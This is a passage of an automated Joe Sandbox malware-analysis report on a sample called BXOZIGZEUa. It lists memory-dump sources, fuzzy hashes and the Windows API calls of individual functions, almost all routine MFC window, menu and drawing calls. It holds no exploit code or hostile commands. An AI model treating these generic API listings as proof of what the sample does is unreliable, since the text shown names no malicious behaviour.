                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: FileTemp$CloseCreateH_prolog3_catchHandleNamePath
                                                              • String ID: AFX$kQZ
                                                              • API String ID: 1737446630-3988653215
                                                              • Opcode ID: 4c66b7ae4beba6d683185f5163a494182adf86414664d82a0a6495c8ebb1bbf4
                                                              • Instruction ID: 355ef2e2c6ca22c7b1eebcf118faa8d361a18451ea0509d1a9e1e009bd2fe4c3
                                                              • Opcode Fuzzy Hash: 4c66b7ae4beba6d683185f5163a494182adf86414664d82a0a6495c8ebb1bbf4
                                                              • Instruction Fuzzy Hash: 7241AD70800159AFCB00EBA5CD56EFEBBB8AF54318F10425EB552A72E1DF386A05CB65
                                                              APIs
                                                                • Part of subcall function 004E4CAE: GetParent.USER32(?), ref: 004E4D02
                                                                • Part of subcall function 004E4CAE: GetLastActivePopup.USER32(?), ref: 004E4D13
                                                                • Part of subcall function 004E4CAE: IsWindowEnabled.USER32(?), ref: 004E4D27
                                                                • Part of subcall function 004E4CAE: EnableWindow.USER32(?,00000000), ref: 004E4D3A
                                                              • EnableWindow.USER32(?,00000001), ref: 004E4DAD
                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 004E4DC1
                                                              • GetCurrentProcessId.KERNEL32(?,?), ref: 004E4DCB
                                                              • SendMessageW.USER32(?,00000376,00000000,00000000), ref: 004E4DE3
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 004E4E5F
                                                              • EnableWindow.USER32(00000000,00000001), ref: 004E4EA6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                              • String ID: 0
                                                              • API String ID: 1877664794-4108050209
                                                              • Opcode ID: 6631e69f15a2913362f16226786d909313ac05131970e01b3f78291e6b843c3f
                                                              • Instruction ID: c246ba07a7f0f036a696e22cdc18a083cd41b74647420cac4000ecb048a6819a
                                                              • Opcode Fuzzy Hash: 6631e69f15a2913362f16226786d909313ac05131970e01b3f78291e6b843c3f
                                                              • Instruction Fuzzy Hash: 2E41C372A002589BCB219F6ACC89BAA77B5FF94701F10059AF519D7290D774DE80CB98
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 0055EBE2
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              • _wcslen.LIBCMT ref: 0055EC5E
                                                              • _wcslen.LIBCMT ref: 0055EC97
                                                              • _wcslen.LIBCMT ref: 0055ECB3
                                                              • _wcslen.LIBCMT ref: 0055ECCF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$H_prolog3$Exception@8Throw
                                                              • String ID: 4)b$SOFTWARE\
                                                              • API String ID: 1893837447-569670547
                                                              • Opcode ID: 75a24cd5d015db167e400fbcabd6be45ec134c5d3faa39e1637de6d007ac7a5b
                                                              • Instruction ID: 9ccc48dd914ba606e1b49abae15a53c9e2e90c33105993cf175739f4037565e4
                                                              • Opcode Fuzzy Hash: 75a24cd5d015db167e400fbcabd6be45ec134c5d3faa39e1637de6d007ac7a5b
                                                              • Instruction Fuzzy Hash: 43316E719110669FCB08BFA1CCA2ABE7769FF10319714446FB416672A2CE38AE44CB55
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004D681D
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004D6840
                                                              • std::bad_exception::bad_exception.LIBCMT ref: 004D68C4
                                                              • __CxxThrowException@8.LIBCMT ref: 004D68D2
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004D68E5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: LockitLockit::_std::_$Exception@8Throwstd::bad_exception::bad_exception
                                                              • String ID: bad cast$t!b
                                                              • API String ID: 2513498551-3587272626
                                                              • Opcode ID: f3b736e1130c2e4b8abb255fd1b382893b1c1dc76d8cee7ed756740516908358
                                                              • Instruction ID: 23ff7f64cc5b014317db250d6fbcecd24532471189feb2112079a90d81c8428d
                                                              • Opcode Fuzzy Hash: f3b736e1130c2e4b8abb255fd1b382893b1c1dc76d8cee7ed756740516908358
                                                              • Instruction Fuzzy Hash: CC31E2759412059FCB24EF54C865BAEBBB0FB02320F11012FF866A7390DB34AD40CB91
                                                              APIs
                                                              • GetParent.USER32(?), ref: 00555690
                                                              • GetSystemMenu.USER32(?,00000000,00000000), ref: 005556BE
                                                              • _memset.LIBCMT ref: 005556DD
                                                              • GetMenuItemInfoW.USER32(?,0000F060,00000000,?), ref: 005556FD
                                                              • SendMessageW.USER32(?,00000112,0000F060,00000000), ref: 00555716
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Menu$Exception@8H_prolog3InfoItemMessageParentSendSystemThrow_memset
                                                              • String ID: 0$`-a
                                                              • API String ID: 177973330-438024179
                                                              • Opcode ID: d9dd5ee295e815c68e26a3dce18bc427017af24e4fca45aad72be9d549f5ac45
                                                              • Instruction ID: 2b6faeed0d5e933367610ac5c4674b309f69ae6aaceea225bfb96a561cdfa022
                                                              • Opcode Fuzzy Hash: d9dd5ee295e815c68e26a3dce18bc427017af24e4fca45aad72be9d549f5ac45
                                                              • Instruction Fuzzy Hash: B221C532A10614BBDB106BA1DCA9F6E7FA9FB14745F04002BFA05D6192EB759C14CBA4
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 0053AE58
                                                                • Part of subcall function 004E011B: ScreenToClient.USER32(?,?), ref: 004E012C
                                                                • Part of subcall function 004E011B: ScreenToClient.USER32(?,?), ref: 004E0139
                                                              • SendMessageW.USER32(?,0000040D,00000000,00000000), ref: 0053AE83
                                                              • OffsetRect.USER32(?,?,?), ref: 0053AEB5
                                                                • Part of subcall function 0055C6F6: _memcpy_s.LIBCMT ref: 0055C728
                                                                • Part of subcall function 0055C6F6: SendMessageW.USER32(?,00000434,00000000,?), ref: 0055C744
                                                              • CopyRect.USER32(?,?), ref: 0053AF6B
                                                              • GetWindowRect.USER32(?,?), ref: 0053AFC1
                                                              • CopyRect.USER32(?,?), ref: 0053B08E
                                                              • CopyRect.USER32(?,?), ref: 0053B0C1
                                                              • CopyRect.USER32(?,?), ref: 0053B13B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$Copy$ClientMessageScreenSendWindow$Offset_memcpy_s
                                                              • String ID:
                                                              • API String ID: 477270663-0
                                                              • Opcode ID: 472a7ec1fd025650dcfd4e0256409b8fecc564e3b488e5866292959ff75815a2
                                                              • Instruction ID: 14fb41380d852303dca18af0886c1cbbe96b50a5386bf24167aa9798e820bc5a
                                                              • Opcode Fuzzy Hash: 472a7ec1fd025650dcfd4e0256409b8fecc564e3b488e5866292959ff75815a2
                                                              • Instruction Fuzzy Hash: ACD14B71A0020ACFDF14DFA8C8889AEBBF9FF48310F14456AE916EB245DB34A945CF11
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$Visible_memset$MetricsRectSystemZoomed
                                                              • String ID:
                                                              • API String ID: 3274878110-0
                                                              • Opcode ID: 93ba4191833a628d2fe620c2bc6b6399918a54dda09f829c7747c3d6172c4a7c
                                                              • Instruction ID: 0003fe567a16db221fea61c6b12452b171e795fed506f63bcb64a607a26890cf
                                                              • Opcode Fuzzy Hash: 93ba4191833a628d2fe620c2bc6b6399918a54dda09f829c7747c3d6172c4a7c
                                                              • Instruction Fuzzy Hash: A1915BB1E012689FCF14DFA9D884AAEBBB5FF89700F14016AF805AB295D7349A41CF51
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 00544BF2
                                                              • EnterCriticalSection.KERNEL32(00646BF4,00000014,0050809A,?,?,00000000,00000000,00000000,00000000), ref: 00544C17
                                                              • SelectObject.GDI32(?,00000014), ref: 00544D06
                                                              • LeaveCriticalSection.KERNEL32(00646BF4,?,00000014,0050809A,?,?,00000000,00000000,00000000,00000000), ref: 00544D25
                                                              • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00544D48
                                                              • SelectObject.GDI32(00000000), ref: 00544D57
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00544DE1
                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00544E01
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Create$BitmapCompatibleCriticalObjectSectionSelect$EnterH_prolog3Leave
                                                              • String ID:
                                                              • API String ID: 4255533662-0
                                                              • Opcode ID: 534f73a3b2758978a375b947764754979b4bb5b90f9f0af0c738de7a191ba462
                                                              • Instruction ID: b0db649f774e4538377ff4b244c8ae7e2f27c71b9a0ddaf73ce9ee4ab50cdf48
                                                              • Opcode Fuzzy Hash: 534f73a3b2758978a375b947764754979b4bb5b90f9f0af0c738de7a191ba462
                                                              • Instruction Fuzzy Hash: 75717E30681B01CFCB21DF65C8C5BAABBE5FB94309B18892EE096C7650DB75AC94DF11
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 005B03A7
                                                              • EqualRect.USER32(?,?), ref: 005B03C6
                                                              • EqualRect.USER32(?,?), ref: 005B03D7
                                                              • CreateRectRgn.GDI32(00000000,00000000,?,?), ref: 005B0427
                                                              • CreateRectRgn.GDI32(?,00000000,?,?), ref: 005B045A
                                                              • CreateRectRgnIndirect.GDI32(?), ref: 005B0466
                                                              • SetWindowRgn.USER32(?,?,00000000), ref: 005B048D
                                                              • RedrawWindow.USER32(?,00000000,00000000,00000105,00644F98,?,?,?,00000001,00000058), ref: 005B0505
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$Create$EqualWindow$H_prolog3IndirectRedraw
                                                              • String ID:
                                                              • API String ID: 1234839666-0
                                                              • Opcode ID: 967addd9ed8cca6719a3033dc40e587d72941fd3bb26b8b5337ade3b88724e34
                                                              • Instruction ID: 350fe6d0446949b7b9567238fa6a3b4e98fb6b70e2ccec8dd221e2efa6cdb300
                                                              • Opcode Fuzzy Hash: 967addd9ed8cca6719a3033dc40e587d72941fd3bb26b8b5337ade3b88724e34
                                                              • Instruction Fuzzy Hash: 4B51057190011AAFCF05DFA4C989EEF7BB9FF44304F018129B915AB295DB74AA45CBA0
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 004E9716
                                                              • BeginDeferWindowPos.USER32(00000008), ref: 004E972E
                                                              • GetTopWindow.USER32(?), ref: 004E9743
                                                              • GetDlgCtrlID.USER32(00000000), ref: 004E9752
                                                              • SendMessageW.USER32(00000000,00000361,00000000,00000000), ref: 004E9784
                                                              • GetWindow.USER32(00000000,00000002), ref: 004E978D
                                                              • CopyRect.USER32(?,?), ref: 004E97AB
                                                              • EndDeferWindowPos.USER32(00000000), ref: 004E9822
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$DeferRect$BeginClientCopyCtrlMessageSend
                                                              • String ID:
                                                              • API String ID: 1228040700-0
                                                              • Opcode ID: 695d2aa19b6ffdba37820ea04dba401e91bf1038b54873b75af8d34ef5d99023
                                                              • Instruction ID: 1b5398e3f5a50dc0e7f423605700cd5f2926b987538f7fb16842ed523893d5fe
                                                              • Opcode Fuzzy Hash: 695d2aa19b6ffdba37820ea04dba401e91bf1038b54873b75af8d34ef5d99023
                                                              • Instruction Fuzzy Hash: 2D516A31910258EFCF10DFAAC8849EEB7B5FF59302F14856AE805A7250DB389D45CFA8
                                                              APIs
                                                                • Part of subcall function 0054CB2E: ReleaseCapture.USER32 ref: 0054CB5C
                                                                • Part of subcall function 0054CB2E: IsWindow.USER32(?), ref: 0054CB80
                                                                • Part of subcall function 0054CB2E: DestroyWindow.USER32(?,?,004FC05C,?,?,?,?,?,004F21AF,00000000,?,004F1D2F), ref: 0054CB90
                                                              • SetRectEmpty.USER32(?), ref: 004F84CA
                                                              • ReleaseCapture.USER32 ref: 004F84D0
                                                              • SetCapture.USER32(?,?,004FC05C,?,?,?,?,?,004F21AF,00000000,?,004F1D2F), ref: 004F84DF
                                                              • GetCapture.USER32 ref: 004F8521
                                                              • ReleaseCapture.USER32 ref: 004F8531
                                                              • SetCapture.USER32(?,?,004FC05C,?,?,?,?,?,004F21AF,00000000,?,004F1D2F), ref: 004F8540
                                                              • RedrawWindow.USER32(?,?,?,00000505), ref: 004F85AB
                                                              • RedrawWindow.USER32(?,00000000,00000000,00000505), ref: 004F85EA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Capture$Window$Release$Redraw$DestroyEmptyRect
                                                              • String ID:
                                                              • API String ID: 2209428161-0
                                                              • Opcode ID: 473b35e216affb7e5359716063e01b65812a5edc57426bbc3e4d949a5d1d9013
                                                              • Instruction ID: d805d7ebdec1d58f20267765515201ff81670f0f609e4497afba7139354a3711
                                                              • Opcode Fuzzy Hash: 473b35e216affb7e5359716063e01b65812a5edc57426bbc3e4d949a5d1d9013
                                                              • Instruction Fuzzy Hash: 20416271200600AFDB24AB35C859E7B7BA5BF84719F150A1EF55ACB3A1DF38E800CB54
                                                              APIs
                                                              • MessageBeep.USER32(000000FF), ref: 00557256
                                                              • ReleaseCapture.USER32 ref: 0055728D
                                                              • GetClientRect.USER32(?,?), ref: 005572B8
                                                              • MapWindowPoints.USER32(?,?,?,00000002), ref: 005572D1
                                                              • GetCursorPos.USER32(?), ref: 005572E1
                                                              • ScreenToClient.USER32(?,?), ref: 005572EE
                                                              • PtInRect.USER32(?,?,?), ref: 005572FE
                                                              • SendMessageW.USER32(?,00000203,?,?), ref: 0055731A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: ClientMessageRect$BeepCaptureCursorPointsReleaseScreenSendWindow
                                                              • String ID:
                                                              • API String ID: 1719883865-0
                                                              • Opcode ID: dda98a64803912ae9200034eff5fa37c26f1a4d96b14385b25c219a9fc93f1a1
                                                              • Instruction ID: f8b3c33524309b42536f14a7767b6a6f247ea21aaaca85d1972684dc66702bcd
                                                              • Opcode Fuzzy Hash: dda98a64803912ae9200034eff5fa37c26f1a4d96b14385b25c219a9fc93f1a1
                                                              • Instruction Fuzzy Hash: 4C419D75604209AFCB149FA5D8989BEBBB6FF0C301F50492EF96AD7160CB34A948DF40
                                                              APIs
                                                              • GetAsyncKeyState.USER32(00000012), ref: 005076B8
                                                              • GetAsyncKeyState.USER32(00000012), ref: 005076D2
                                                              • _memset.LIBCMT ref: 005076F1
                                                              • GetKeyboardState.USER32(?), ref: 00507700
                                                              • GetKeyboardLayout.USER32(?), ref: 00507717
                                                              • MapVirtualKeyW.USER32(?,00000000), ref: 00507733
                                                              • ToUnicodeEx.USER32(?,00000000), ref: 0050773B
                                                              • CharUpperW.USER32(?), ref: 00507748
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: State$AsyncKeyboard$CharLayoutUnicodeUpperVirtual_memset
                                                              • String ID:
                                                              • API String ID: 3224171628-0
                                                              • Opcode ID: cf019f8495956cbf414540afd8c58515ac2dedd7621f4d2b2285509f011e04a1
                                                              • Instruction ID: 91c679476f0133d5d259545ae44604832970d193976876cac4e60b5b9c76c34e
                                                              • Opcode Fuzzy Hash: cf019f8495956cbf414540afd8c58515ac2dedd7621f4d2b2285509f011e04a1
                                                              • Instruction Fuzzy Hash: 7B219275A0420DABDB10AB64DC85FFD7BACFB65B40F40005AF642D61C1EFB4A984DBA1
                                                              APIs
                                                              • GetMenuItemCount.USER32(?), ref: 004DA392
                                                              • GetMenuItemCount.USER32(?), ref: 004DA39A
                                                              • GetSubMenu.USER32(?,-00000001), ref: 004DA3B7
                                                              • GetMenuItemCount.USER32(00000000), ref: 004DA3C7
                                                              • GetSubMenu.USER32(00000000,00000000), ref: 004DA3D8
                                                              • RemoveMenu.USER32(00000000,00000000,00000400), ref: 004DA3F5
                                                              • GetSubMenu.USER32(?,?), ref: 004DA40F
                                                              • RemoveMenu.USER32(?,?,00000400), ref: 004DA42D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
